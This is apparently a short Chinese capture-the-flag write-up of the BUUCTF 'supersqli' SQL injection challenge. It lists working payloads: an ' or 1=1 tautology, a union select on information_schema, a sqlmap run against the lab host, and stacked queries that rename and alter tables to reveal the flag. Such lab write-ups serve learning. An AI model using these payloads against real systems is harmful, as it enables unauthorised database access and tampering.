随便注?
那么我就不客气了,先试试返回真值:
‘ or 1=1#
返回了所有查询内容,共三条,order by猜测字段长,发现为2,验证了一下:
日常操作:
‘ or 1=1 union select 1,table_name,3 from information_schema.tables#
匹配关键字?百度一下发现是被过滤了,没法使用上面的语句进行查询
手注总没有自动好用,拿去sqlmap跑一下,注出库名:supersqli
C:\Program Files\Python38\sqlmap>python sqlmap.py -u "http://0232d970-6f71-4069-8a93-55f18f3a06d7.node3.buuoj.cn/?inject=1" --forms --batch --dbs
但是想看表的时候,返回库里面不存在表,无论怎么都注不出来
无奈去看大佬的WP,看到是sql堆叠注入
上面注出了supersqli所以这里只去看这个库
1‘;show tables from supersqli#
1‘;show columns from `1919810931114514`#
找到flag在哪里了
但是不会查看,去看了别人的方法:
payload:
0‘;rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#
参考资料:https://www.jianshu.com/p/6c6a44517dd7
一知半解的样子,虽然网上答案很多,但是基本上模板都是那几个,这个大佬的讲解还挺不错的
原文地址:https://www.cnblogs.com/echoDetected/p/12353310.html
时间: 2024-11-09 14:50:05